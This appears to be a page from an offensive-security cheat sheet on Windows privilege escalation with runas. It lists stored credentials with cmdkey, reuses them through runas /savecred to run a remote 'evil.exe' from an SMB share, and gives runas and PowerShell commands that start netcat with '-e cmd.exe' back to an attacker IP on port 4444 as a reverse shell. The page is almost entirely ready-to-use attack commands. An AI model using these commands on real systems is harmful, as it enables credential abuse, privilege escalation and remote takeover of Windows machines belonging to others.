Runas

1. Use the cmdkey to list the stored credentials on the machine

cmdkey /list

Currently stored credentials:

Target: Domain:interactive=WORKGROUP\Administrator

Type: Domain Password

User: WORKGROUP\Administrator

2. Then you can use runas with the /savecred options in order to use the saved credentials. The following example is calling a remote binary via an SMB share

runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"

runas /savecred /user:Administrator "cmd.exe /k whoami"

3. Using runas with a provided set of credential

C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"

$secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force

$mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)

$computer = "<hostname>"

[System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)

PreviousLooting for passwordsNextImpersonation Privileges

Last updated